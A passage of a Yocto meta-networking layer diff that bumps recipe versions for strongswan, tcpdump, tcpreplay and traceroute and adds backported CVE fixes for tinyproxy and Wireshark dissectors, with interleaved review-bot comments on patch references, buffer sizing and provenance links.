!check_lifetime(this, issuer, "issuer", pathlen + 1, anchor, auth)) + { + return FALSE; + } +@@ -622,7 +622,7 @@ static bool check_certificate(private_credential_manager_t *this, + continue; + } + if (!validator->validate(validator, subject, issuer, +- online, pathlen, trusted, auth)) ++ online, pathlen, anchor, auth)) + { + enumerator->destroy(enumerator); + return FALSE; +@@ -725,6 +725,7 @@ static bool verify_trust_chain(private_credential_manager_t *this, + auth_cfg_t *auth; + 
signature_params_t *scheme; + int pathlen; ++ bool is_anchor = FALSE; + + auth = auth_cfg_create(); + get_key_strength(subject, auth); +@@ -742,7 +743,7 @@ static bool verify_trust_chain(private_credential_manager_t *this, + auth->add(auth, AUTH_RULE_CA_CERT, issuer->get_ref(issuer)); + DBG1(DBG_CFG, " using trusted ca certificate \"%Y\"", + issuer->get_subject(issuer)); +- trusted = TRUE; ++ trusted = is_anchor = TRUE; + } + else + { +@@ -777,11 +778,18 @@ static bool verify_trust_chain(private_credential_manager_t *this, + DBG1(DBG_CFG, " issuer is \"%Y\"", + current->get_issuer(current)); + call_hook(this, CRED_HOOK_NO_ISSUER, current); ++ if (trusted) ++ { ++ DBG1(DBG_CFG, " reached end of incomplete trust chain for " ++ "trusted certificate \"%Y\"", ++ subject->get_subject(subject)); ++ } + break; + } + } +- if (!check_certificate(this, current, issuer, online, +- pathlen, trusted, auth)) ++ /* don't do online verification here */ ++ if (!check_certificate(this, current, issuer, FALSE, ++ pathlen, is_anchor, auth)) + { + trusted = FALSE; + issuer->destroy(issuer); +@@ -793,7 +801,7 @@ static bool verify_trust_chain(private_credential_manager_t *this, + } + current->destroy(current); + current = issuer; +- if (trusted) ++ if (is_anchor) + { + DBG1(DBG_CFG, " reached self-signed root ca with a " + "path length of %d", pathlen); +@@ -806,6 +814,34 @@ static bool verify_trust_chain(private_credential_manager_t *this, + DBG1(DBG_CFG, "maximum path length of %d exceeded", MAX_TRUST_PATH_LEN); + call_hook(this, CRED_HOOK_EXCEEDED_PATH_LEN, subject); + } ++ else if (trusted && online) ++ { ++ enumerator_t *enumerator; ++ auth_rule_t rule; ++ ++ /* do online revocation checks after basic validation of the chain */ ++ pathlen = 0; ++ current = subject; ++ enumerator = auth->create_enumerator(auth); ++ while (enumerator->enumerate(enumerator, &rule, &issuer)) ++ { ++ if (rule == AUTH_RULE_CA_CERT || rule == AUTH_RULE_IM_CERT) ++ { ++ if (!check_certificate(this, current, 
issuer, TRUE, pathlen++, ++ rule == AUTH_RULE_CA_CERT, auth)) ++ { ++ trusted = FALSE; ++ break; ++ } ++ else if (rule == AUTH_RULE_CA_CERT) ++ { ++ break; ++ } ++ current = issuer; ++ } ++ } ++ enumerator->destroy(enumerator); ++ } + if (trusted) + { + result->merge(result, auth, FALSE); +-- +2.25.1 + diff --git a/meta-networking/recipes-support/strongswan/strongswan_5.9.6.bb b/meta-networking/recipes-support/strongswan/strongswan_5.9.13.bb index 1b82dceac2..afa1a684b1 100644 --- a/meta-networking/recipes-support/strongswan/strongswan_5.9.6.bb +++ b/meta-networking/recipes-support/strongswan/strongswan_5.9.13.bb @@ -8,11 +8,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "flex-native flex bison-native" DEPENDS:append = "${@bb.utils.contains('DISTRO_FEATURES', 'tpm2', ' tpm2-tss', '', d)}" -SRC_URI = "http://download.strongswan.org/strongswan-${PV}.tar.bz2 \ - file://0001-enum-Fix-compiler-warning.patch \ +SRC_URI = "https://download.strongswan.org/strongswan-${PV}.tar.bz2 \ " -SRC_URI[sha256sum] = "91d0978ac448912759b85452d8ff0d578aafd4507aaf4f1c1719f9d0c7318ab7" +SRC_URI[sha256sum] = "56e30effb578fd9426d8457e3b76c8c3728cd8a5589594b55649b2719308ba55" UPSTREAM_CHECK_REGEX = "strongswan-(?P<pver>\d+(\.\d+)+)\.tar" @@ -40,7 +39,6 @@ PACKAGECONFIG[gmp] = "--enable-gmp,--disable-gmp,gmp,${PN}-plugin-gmp" PACKAGECONFIG[ldap] = "--enable-ldap,--disable-ldap,openldap,${PN}-plugin-ldap" PACKAGECONFIG[mysql] = "--enable-mysql,--disable-mysql,mysql5,${PN}-plugin-mysql" PACKAGECONFIG[openssl] = "--enable-openssl,--disable-openssl,openssl,${PN}-plugin-openssl" -PACKAGECONFIG[scep] = "--enable-scepclient,--disable-scepclient," PACKAGECONFIG[soup] = "--enable-soup,--disable-soup,libsoup-2.4,${PN}-plugin-soup" PACKAGECONFIG[sqlite3] = "--enable-sqlite,--disable-sqlite,sqlite3,${PN}-plugin-sqlite" PACKAGECONFIG[stroke] = "--enable-stroke,--disable-stroke,,${PN}-plugin-stroke" 
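Review bot: The new `SRC_URI` in the `@@ -8,11 +8,10 @@` hunk of the strongswan recipe lists only the release tarball, so the `files/CVE-2022-40617.patch` added just above in this diff is not referenced by any line visible here and would never be applied. If 5.9.13 already carries the upstream fix (presumably, given the jump from 5.9.6), the patch file should be removed from the layer rather than left behind; if it is still needed, `file://CVE-2022-40617.patch \` belongs back in `SRC_URI`. An unreferenced CVE-named patch misleads anyone auditing the layer's fix coverage by filename. A `.bbappend` or include outside this diff could still reference it, so check before deleting.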
@@ -145,11 +143,16 @@ RDEPENDS:${PN} += "\ ${PN}-plugin-attr \ ${PN}-plugin-cmac \ ${PN}-plugin-constraints \ + ${PN}-plugin-drbg \ + ${PN}-plugin-fips-prf \ ${PN}-plugin-des \ ${PN}-plugin-dnskey \ + ${PN}-plugin-gcm \ ${PN}-plugin-hmac \ + ${PN}-plugin-kdf \ ${PN}-plugin-kernel-netlink \ ${PN}-plugin-md5 \ + ${PN}-plugin-mgf1 \ ${PN}-plugin-nonce \ ${PN}-plugin-pem \ ${PN}-plugin-pgp \ diff --git a/meta-networking/recipes-support/tcpdump/tcpdump_4.99.1.bb b/meta-networking/recipes-support/tcpdump/tcpdump_4.99.4.bb index 322a826f07..803a9bb5f5 100644 --- a/meta-networking/recipes-support/tcpdump/tcpdump_4.99.1.bb +++ b/meta-networking/recipes-support/tcpdump/tcpdump_4.99.4.bb @@ -26,8 +26,7 @@ SRC_URI = " \ file://run-ptest \ " -SRC_URI[md5sum] = "929a255c71a9933608bd7c31927760f7" -SRC_URI[sha256sum] = "79b36985fb2703146618d87c4acde3e068b91c553fb93f021a337f175fd10ebe" +SRC_URI[sha256sum] = "0232231bb2f29d6bf2426e70a08a7e0c63a0d59a9b44863b7f5e2357a6e49fea" UPSTREAM_CHECK_REGEX = "tcpdump-(?P<pver>\d+(\.\d+)+)\.tar" diff --git a/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.2.bb b/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.4.bb index 165a0e735b..1e2495efd6 100644 --- a/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.2.bb +++ b/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.4.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE;md5=10f0474a2f0e5dccfca20f69d6598ad8" SRC_URI = "https://github.com/appneta/tcpreplay/releases/download/v${PV}/tcpreplay-${PV}.tar.gz" -SRC_URI[sha256sum] = "5b272cd83b67d6288a234ea15f89ecd93b4fadda65eddc44e7b5fcb2f395b615" +SRC_URI[sha256sum] = "44f18fb6d3470ecaf77a51b901a119dae16da5be4d4140ffbb2785e37ad6d4bf" UPSTREAM_CHECK_URI = "https://github.com/appneta/tcpreplay/releases" diff --git a/meta-networking/recipes-support/tinyproxy/tinyproxy/CVE-2022-40468.patch b/meta-networking/recipes-support/tinyproxy/tinyproxy/CVE-2022-40468.patch new file mode 100644 index 0000000000..4e2157ca75 
--- /dev/null +++ b/meta-networking/recipes-support/tinyproxy/tinyproxy/CVE-2022-40468.patch @@ -0,0 +1,33 @@ +From 3764b8551463b900b5b4e3ec0cd9bb9182191cb7 Mon Sep 17 00:00:00 2001 +From: rofl0r <rofl0r@users.noreply.github.com> +Date: Thu, 8 Sep 2022 15:18:04 +0000 +Subject: [PATCH] prevent junk from showing up in error page in invalid + requests + +fixes #457 + +https://github.com/tinyproxy/tinyproxy/commit/3764b8551463b900b5b4e3ec0cd9bb9182191cb7 +Upstream-Status: Backport +CVE: CVE-2022-40468 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + src/reqs.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/src/reqs.c b/src/reqs.c +index bce69819..45db118d 100644 +--- a/src/reqs.c ++++ b/src/reqs.c +@@ -343,8 +343,12 @@ static struct request_s *process_request (struct conn_s *connptr, + goto fail; + } + ++ /* zero-terminate the strings so they don't contain junk in error page */ ++ request->method[0] = url[0] = request->protocol[0] = 0; ++ + ret = sscanf (connptr->request_line, "%[^ ] %[^ ] %[^ ]", + request->method, url, request->protocol); ++ + if (ret == 2 && !strcasecmp (request->method, "GET")) { + request->protocol[0] = 0; + diff --git a/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb b/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb index 388f7aecbb..4ddb202268 100644 --- a/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb +++ b/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb @@ -7,6 +7,7 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.gz file://disable-documentation.patch \ file://tinyproxy.service \ file://tinyproxy.conf \ + file://CVE-2022-40468.patch \ " SRC_URI[md5sum] = "658db5558ffb849414341b756a546a99" diff --git a/meta-networking/recipes-support/traceroute/traceroute_2.1.0.bb b/meta-networking/recipes-support/traceroute/traceroute_2.1.3.bb index 9cac204998..ed75ba34de 100644 --- a/meta-networking/recipes-support/traceroute/traceroute_2.1.0.bb 
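Review bot: The `sscanf` call kept as context in the inner hunk uses three `%[^ ]` conversions with no field width, so nothing visible here bounds what is written into `request->method`, `url` and `request->protocol`; the added zero-termination only covers fields that `sscanf` leaves unwritten. The allocations are outside the hunk, so it is worth confirming that each buffer is sized from the length of `connptr->request_line` and, once confirmed, recording that invariant in a comment next to the call. Separately, the patch header gives `Upstream-Status: Backport` without the bracketed reference; `Upstream-Status: Backport [https://github.com/tinyproxy/tinyproxy/commit/3764b8551463b900b5b4e3ec0cd9bb9182191cb7]` matches the form the other backports in this diff use.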
+++ b/meta-networking/recipes-support/traceroute/traceroute_2.1.3.bb @@ -17,8 +17,7 @@ UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/traceroute/files/tracerou SRC_URI = "${SOURCEFORGE_MIRROR}/traceroute/traceroute/${BP}/${BP}.tar.gz \ " -SRC_URI[md5sum] = "84d329d67abc3fb83fc8cb12aeaddaba" -SRC_URI[sha256sum] = "3669d22a34d3f38ed50caba18cd525ba55c5c00d5465f2d20d7472e5d81603b6" +SRC_URI[sha256sum] = "05ebc7aba28a9100f9bbae54ceecbf75c82ccf46bdfce8b5d64806459a7e0412" EXTRA_OEMAKE = "VPATH=${STAGING_LIBDIR}" LTOEXTRA += "-flto-partition=none" diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2022-4345.patch b/meta-networking/recipes-support/wireshark/files/CVE-2022-4345.patch new file mode 100644 index 0000000000..ccf04459e8 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2022-4345.patch 
@@ -0,0 +1,52 @@ +From 39db474f80af87449ce0f034522dccc80ed4153f Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 1 Dec 2022 20:46:15 -0500 +Subject: [PATCH] openflow_v6: Prevent infinite loops in too short ofp_stats + +The ofp_stats struct length field includes the fixed 4 bytes. +If the length is smaller than that, report the length error +and break out. In particular, a value of zero can cause +infinite loops if this isn't done. + + +(cherry picked from commit 13823bb1059cf70f401892ba1b1eaa2400cdf3db) + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/39db474f80af87449ce0f034522dccc80ed4153f] +CVE: CVE-2022-4345 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + epan/dissectors/packet-openflow_v6.c | 8 +++++++- + 1 file changed, 7 insertions(+), 1 deletion(-) + +diff --git a/epan/dissectors/packet-openflow_v6.c b/epan/dissectors/packet-openflow_v6.c +index 16016af..3e24d76 100644 +--- a/epan/dissectors/packet-openflow_v6.c ++++ b/epan/dissectors/packet-openflow_v6.c +@@ -1118,17 +1118,23 @@ dissect_openflow_v6_oxs(tvbuff_t *tvb, packet_info *pinfo _U_, proto_tree *tree, + static int + dissect_openflow_stats_v6(tvbuff_t *tvb, packet_info *pinfo _U_, proto_tree *tree, int offset, guint16 length _U_) + { ++ proto_item *ti; + guint32 stats_length; + int oxs_end; + guint32 padding; + + proto_tree_add_item(tree, hf_openflow_v6_stats_reserved, tvb, offset, 2, ENC_NA); + +- proto_tree_add_item_ret_uint(tree, hf_openflow_v6_stats_length, tvb, offset+2, 2, ENC_BIG_ENDIAN, &stats_length); ++ ti = proto_tree_add_item_ret_uint(tree, hf_openflow_v6_stats_length, tvb, offset+2, 2, ENC_BIG_ENDIAN, &stats_length); + + oxs_end = offset + stats_length; + offset+=4; + ++ if (stats_length < 4) { ++ expert_add_info(pinfo, ti, &ei_openflow_v6_length_too_short); ++ return offset; ++ } ++ + while (offset < oxs_end) { + offset = dissect_openflow_v6_oxs(tvb, pinfo, tree, offset, oxs_end - offset); + } +-- +2.40.1 + 
diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-0666.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-0666.patch
new file mode 100644
index 0000000000..7732916826
--- /dev/null
+++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-0666.patch
@@ -0,0 +1,122 @@ +From 265cbf15a418b629c3c8f02c0ba901913b1c8fd2 Mon Sep 17 00:00:00 2001 +From: Gerald Combs <gerald@wireshark.org> +Date: Thu, 18 May 2023 13:52:48 -0700 +Subject: [PATCH] RTPS: Fixup our g_strlcpy dest_sizes + +Use the proper dest_size in various g_strlcpy calls. + +Fixes #19085 + +(cherry picked from commit 28fdce547c417b868c521f87fb58f71ca6b1e3f7) + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/265cbf15a418b629c3c8f02c0ba901913b1c8fd2] +CVE: CVE-2023-0666 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-rtps.c | 22 +++++++++++----------- + 1 file changed, 11 insertions(+), 11 deletions(-) + +diff --git a/epan/dissectors/packet-rtps.c b/epan/dissectors/packet-rtps.c +index 5c2d1c1..ef592d7 100644 +--- a/epan/dissectors/packet-rtps.c ++++ b/epan/dissectors/packet-rtps.c +@@ -3025,7 +3025,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + ++tk_id; + } + +- g_strlcpy(type_name, rtps_util_typecode_id_to_string(tk_id), 40); ++ g_strlcpy(type_name, rtps_util_typecode_id_to_string(tk_id), sizeof(type_name)); + + /* Structure of the typecode data: + * +@@ -3196,7 +3196,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + member_name, -1, NULL, ndds_40_hack); + } + /* Finally prints the name of the struct (if provided) */ +- g_strlcpy(type_name, "}", 40); ++ g_strlcpy(type_name, "}", sizeof(type_name)); + break; + + } /* end of case UNION */ +@@ -3367,7 +3367,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + } + } + /* Finally prints the name of the struct (if provided) */ +- g_strlcpy(type_name, "}", 40); ++ g_strlcpy(type_name, "}", sizeof(type_name)); + break; + } + +@@ -3459,7 +3459,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + offset += 4; + alias_name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, alias_name_length, 
ENC_ASCII); + offset += alias_name_length; +- g_strlcpy(type_name, alias_name, 40); ++ g_strlcpy(type_name, alias_name, sizeof(type_name)); + break; + } + +@@ -3494,7 +3494,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + if (tk_id == RTI_CDR_TK_VALUE_PARAM) { + type_id_name = "valueparam"; + } +- g_snprintf(type_name, 40, "%s '%s'", type_id_name, value_name); ++ g_snprintf(type_name, sizeof(type_name), "%s '%s'", type_id_name, value_name); + break; + } + } /* switch(tk_id) */ +@@ -3673,7 +3673,7 @@ static gint rtps_util_add_type_library_type(proto_tree *tree, + long_number = tvb_get_guint32(tvb, offset_tmp, encoding); + name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset_tmp+4, long_number, ENC_ASCII); + if (info) +- g_strlcpy(info->member_name, name, long_number); ++ g_strlcpy(info->member_name, name, sizeof(info->member_name)); + + proto_item_append_text(tree, " %s", name); + offset += member_length; +@@ -3848,13 +3848,13 @@ static gint rtps_util_add_type_member(proto_tree *tree, + proto_item_append_text(tree, " %s (ID: %d)", name, member_id); + if (member_object) { + member_object->member_id = member_id; +- g_strlcpy(member_object->member_name, name, long_number < 256 ? long_number : 256); ++ g_strlcpy(member_object->member_name, name, sizeof(member_object->member_name)); + member_object->type_id = member_type_id; + } + if (info && info->extensibility == EXTENSIBILITY_MUTABLE) { + mutable_member_mapping * mutable_mapping = NULL; + mutable_mapping = wmem_new(wmem_file_scope(), mutable_member_mapping); +- g_strlcpy(mutable_mapping->member_name, name, long_number < 256 ? 
long_number : 256); ++ g_strlcpy(mutable_mapping->member_name, name, sizeof(mutable_mapping->member_name)); + mutable_mapping->struct_type_id = info->type_id; + mutable_mapping->member_type_id = member_type_id; + mutable_mapping->member_id = member_id; +@@ -3909,7 +3909,7 @@ static gint rtps_util_add_type_union_member(proto_tree *tree, + union_member_mapping * mapping = NULL; + + mapping = wmem_new(wmem_file_scope(), union_member_mapping); +- g_strlcpy(mapping->member_name, object.member_name, 256); ++ g_strlcpy(mapping->member_name, object.member_name, sizeof(mapping->member_name)); + mapping->member_type_id = object.type_id; + mapping->discriminator = HASHMAP_DISCRIMINATOR_CONSTANT; + mapping->union_type_id = union_type_id + mapping->discriminator; +@@ -3922,7 +3922,7 @@ static gint rtps_util_add_type_union_member(proto_tree *tree, + union_member_mapping * mapping = NULL; + + mapping = wmem_new(wmem_file_scope(), union_member_mapping); +- g_strlcpy(mapping->member_name, object.member_name, 256); ++ g_strlcpy(mapping->member_name, object.member_name, sizeof(mapping->member_name)); + mapping->member_type_id = object.type_id; + mapping->discriminator = -1; + mapping->union_type_id = union_type_id + mapping->discriminator; +@@ -3942,7 +3942,7 @@ static gint rtps_util_add_type_union_member(proto_tree *tree, + ti = proto_tree_add_item(labels, hf_rtps_type_object_union_label, tvb, offset_tmp, 4, encoding); + offset_tmp += 4; + +- g_strlcpy(mapping->member_name, object.member_name, 256); ++ g_strlcpy(mapping->member_name, object.member_name, sizeof(mapping->member_name)); + mapping->member_type_id = object.type_id; + mapping->discriminator = discriminator_case; + mapping->union_type_id = union_type_id + discriminator_case; +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-0667.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-0667.patch new file mode 100644 index 0000000000..cd07395aac --- /dev/null 
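Review bot: Every replacement in this patch relies on `sizeof(dest)` yielding the buffer size, which holds only if `type_name`, `info->member_name`, `member_object->member_name` and `mapping->member_name` are fixed-size arrays in the Wireshark version this recipe builds; none of those declarations are inside the hunks. If any of them is a pointer in the backport target, `sizeof` silently becomes the pointer size and the copy truncates to a few bytes, so the build passes while the dissected names are cut short. Worth checking against the unpacked source that the declarations are arrays and match the literal sizes `40` and `256` used by the removed lines.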
+++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-0667.patch 
@@ -0,0 +1,66 @@ +From 85fbca8adb09ea8e1af635db3d92727fbfa1e28a Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 18 May 2023 18:06:36 -0400 +Subject: [PATCH] MS-MMS: Use format_text_string() + +The length of a string transcoded from UTF-16 to UTF-8 can be +shorter (or longer) than the original length in bytes in the packet. +Use the new string length, not the original length. + +Use format_text_string, which is a convenience function that +calls strlen. + +Fix #19086 + +(cherry picked from commit 1c45a899f83fa88e60ab69936bea3c4754e7808b) + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/85fbca8adb09ea8e1af635db3d92727fbfa1e28a] +CVE: CVE-2023-0667 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-ms-mms.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/epan/dissectors/packet-ms-mms.c b/epan/dissectors/packet-ms-mms.c +index f4dbcd0..092a64b 100644 +--- a/epan/dissectors/packet-ms-mms.c ++++ b/epan/dissectors/packet-ms-mms.c +@@ -740,7 +740,7 @@ static void dissect_client_transport_info(tvbuff_t *tvb, packet_info *pinfo, pro + transport_info, "Transport: (%s)", transport_info); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (%s)", +- format_text(wmem_packet_scope(), (guchar*)transport_info, length_remaining - 20)); ++ format_text_string(pinfo->pool, (const guchar*)transport_info)); + + + /* Try to extract details from this string */ +@@ -837,7 +837,7 @@ static void dissect_server_info(tvbuff_t *tvb, packet_info *pinfo, proto_tree *t + ENC_UTF_16|ENC_LITTLE_ENDIAN, wmem_packet_scope(), &server_version); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (version='%s')", +- format_text(wmem_packet_scope(), (const guchar*)server_version, strlen(server_version))); ++ format_text_string(pinfo->pool, (const guchar*)server_version)); + } + offset += (server_version_length*2); + +@@ -891,7 +891,7 @@ static void dissect_client_player_info(tvbuff_t *tvb, 
packet_info *pinfo, proto_ + ENC_UTF_16|ENC_LITTLE_ENDIAN, wmem_packet_scope(), &player_info); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (%s)", +- format_text(wmem_packet_scope(), (const guchar*)player_info, strlen(player_info))); ++ format_text_string(pinfo->pool, (const guchar*)player_info)); + } + + /* Dissect info about where client wants to start playing from */ +@@ -966,7 +966,7 @@ static void dissect_request_server_file(tvbuff_t *tvb, packet_info *pinfo, proto + ENC_UTF_16|ENC_LITTLE_ENDIAN, wmem_packet_scope(), &server_file); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (%s)", +- format_text(wmem_packet_scope(), (const guchar*)server_file, strlen(server_file))); ++ format_text_string(pinfo->pool, (const guchar*)server_file)); + } + + /* Dissect media details from server */ +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-0668.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-0668.patch new file mode 100644 index 0000000000..0009939330 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-0668.patch 
@@ -0,0 +1,33 @@
+From c4f37d77b29ec6a9754795d0efb6f68d633728d9 Mon Sep 17 00:00:00 2001
+From: John Thacker <johnthacker@gmail.com>
+Date: Sat, 20 May 2023 23:08:08 -0400
+Subject: [PATCH] synphasor: Use val_to_str_const
+
+Don't use a value from packet data to directly index a value_string,
+particularly when the value string doesn't cover all possible values.
+
+Fix #19087
+
+Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/c4f37d77b29ec6a9754795d0efb6f68d633728d9]
+CVE: CVE-2023-0668
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ epan/dissectors/packet-synphasor.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/epan/dissectors/packet-synphasor.c b/epan/dissectors/packet-synphasor.c
+index 12b388b..fbde875 100644
+--- a/epan/dissectors/packet-synphasor.c
++++ b/epan/dissectors/packet-synphasor.c
+@@ -1212,7 +1212,7 @@ static gint dissect_PHSCALE(tvbuff_t *tvb, proto_tree *tree, gint offset, gint c
+
+ data_flag_tree = proto_tree_add_subtree_format(single_phasor_scaling_and_flags_tree, tvb, offset, 4,
+ ett_conf_phflags, NULL, "Phasor Data flags: %s",
+- conf_phasor_type[tvb_get_guint8(tvb, offset + 2)].strptr);
++ val_to_str_const(tvb_get_guint8(tvb, offset + 2), conf_phasor_type, "Unknown"));
+
+ /* first and second bytes - phasor modification flags*/
+ phasor_flag1_tree = proto_tree_add_subtree_format(data_flag_tree, tvb, offset, 2, ett_conf_phmod_flags,
+--
+2.25.1
+
diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-1992.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-1992.patch
new file mode 100644
index 0000000000..6bddf975d0
--- /dev/null
+++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-1992.patch
@@ -0,0 +1,61 @@ +From 3c8be14c827f1587da3c2b3bb0d9c04faff57413 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Sun, 19 Mar 2023 15:16:39 -0400 +Subject: [PATCH] RPCoRDMA: Frame end cleanup for global write offsets + +Add a frame end routine for a global which is assigned to packet +scoped memory. It really should be made proto data, but is used +in a function in the header (that doesn't take the packet info +struct as an argument) and this fix needs to be made in stable +branches. + +Fix #18852 + +Upstream-Status: Backport [https://gitlab.com/colin.mcinnes/wireshark/-/commit/3c8be14c827f1587da3c2b3bb0d9c04faff5741] +CVE: CVE-2023-1992 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + epan/dissectors/packet-rpcrdma.c | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + +diff --git a/epan/dissectors/packet-rpcrdma.c b/epan/dissectors/packet-rpcrdma.c +index 76085c7..9d57bae 100644 +--- a/epan/dissectors/packet-rpcrdma.c ++++ b/epan/dissectors/packet-rpcrdma.c +@@ -24,6 +24,7 @@ + #include <epan/addr_resolv.h> + + #include "packet-rpcrdma.h" ++#include "packet-frame.h" + #include "packet-infiniband.h" + #include "packet-iwarp-ddp-rdmap.h" + +@@ -270,6 +271,18 @@ void rpcrdma_insert_offset(gint offset) + wmem_array_append_one(gp_rdma_write_offsets, offset); + } + ++/* ++ * Reset the array of write offsets at the end of the frame. These ++ * are packet scoped, so they don't need to be freed, but we want ++ * to ensure that the global doesn't point to no longer allocated ++ * memory in a later packet. 
++ */ ++static void ++reset_write_offsets(void) ++{ ++ gp_rdma_write_offsets = NULL; ++} ++ + /* Get conversation state, it is created if it does not exist */ + static rdma_conv_info_t *get_rdma_conv_info(packet_info *pinfo) + { +@@ -1392,6 +1405,7 @@ dissect_rpcrdma(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void* data + if (write_size > 0 && !pinfo->fd->visited) { + /* Initialize array of write chunk offsets */ + gp_rdma_write_offsets = wmem_array_new(wmem_packet_scope(), sizeof(gint)); ++ register_frame_end_routine(pinfo, reset_write_offsets); + TRY { + /* + * Call the upper layer dissector to get a list of offsets +-- +2.40.1 diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2855.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2855.patch new file mode 100644 index 0000000000..b4718f4607 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2855.patch 
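Review bot: The `Upstream-Status` link in this patch header points at `gitlab.com/colin.mcinnes/wireshark`, not the `gitlab.com/wireshark/wireshark` project that the other Wireshark backports in this diff cite, and its commit id ends in `...faff5741` while the `From` line gives `...faff57413`, so the URL as written is one character short. For a security backport the provenance line should resolve to the upstream project, e.g. `Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/3c8be14c827f1587da3c2b3bb0d9c04faff57413]`. Confirm that a commit with that id exists upstream before changing the link, since the fork may be where the backport was actually taken from.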
@@ -0,0 +1,108 @@ +From 0181fafb2134a177328443a60b5e29c4ee1041cb Mon Sep 17 00:00:00 2001 +From: Guy Harris <gharris@sonic.net> +Date: Tue, 16 May 2023 12:05:07 -0700 +Subject: [PATCH] candump: check for a too-long frame length. + +If the frame length is longer than the maximum, report an error in the +file. + +Fixes #19062, preventing the overflow on a buffer on the stack (assuming +your compiler doesn't call a bounds-checknig version of memcpy() if the +size of the target space is known). + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/0181fafb2134a177328443a60b5e29c4ee1041cb] +CVE: CVE-2023-2855 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + wiretap/candump.c | 39 +++++++++++++++++++++++++++++++-------- + 1 file changed, 31 insertions(+), 8 deletions(-) + +diff --git a/wiretap/candump.c b/wiretap/candump.c +index 0def7bc..3f7c2b2 100644 +--- a/wiretap/candump.c ++++ b/wiretap/candump.c +@@ -26,8 +26,9 @@ static gboolean candump_seek_read(wtap *wth, gint64 seek_off, + wtap_rec *rec, Buffer *buf, + int *err, gchar **err_info); + +-static void +-candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) ++static gboolean ++candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg, int *err, ++ gchar **err_info) + { + static const char *can_proto_name = "can-hostendian"; + static const char *canfd_proto_name = "canfd"; +@@ -59,6 +60,18 @@ candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) + { + canfd_frame_t canfd_frame = {0}; + ++ /* ++ * There's a maximum of CANFD_MAX_DLEN bytes in a CAN-FD frame. 
